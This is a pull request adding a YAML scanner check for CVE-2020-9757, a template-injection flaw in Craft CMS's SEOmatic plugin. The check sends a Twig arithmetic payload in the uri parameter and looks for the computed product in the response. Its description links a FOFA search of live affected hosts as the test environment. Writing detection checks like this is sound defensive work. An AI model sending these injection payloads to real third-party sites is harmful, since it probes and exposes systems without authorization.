### PR TITLE
Create craftcms-seomatic-cve-2020-9757-rce

### DIFF
--- a/pocs/craftcms-seomatic-cve-2020-9757-rce.yml
+++ b/pocs/craftcms-seomatic-cve-2020-9757-rce.yml
@@ -6,7 +6,7 @@ groups:
   poc1:
     - method: GET
       path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
-      expression: >
+      expression: |
         response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
   poc2:
     - method: GET

--- a/pocs/craftcms-seomatic-cve-2020-9757-rce.yml
+++ b/pocs/craftcms-seomatic-cve-2020-9757-rce.yml
@@ -1,0 +1,20 @@
+name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+groups:
+  poc1:
+    - method: GET
+      path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
+      expression: >
+        response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
+  poc2:
+    - method: GET
+      path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
+      expression: |
+        response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: x1n9Qi8
+  links:
+    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Craft CMS是一套内容管理系统（CMS）。Seomatic是其中的一个SEO（搜索引擎优化）组件。

Seomatic 3.3.0之前版本（用于Craft CMS）中存在安全漏洞。攻击者可利用该漏洞向服务器端注入模板，获取信息。
## 测试环境
https://fofa.so/result?q=header%3D%22SEOmatic%22+%26%26+header%3D%22Craft+CMS%22&qbase64=aGVhZGVyPSJTRU9tYXRpYyIgJiYgaGVhZGVyPSJDcmFmdCBDTVMi&file=&file=
## 备注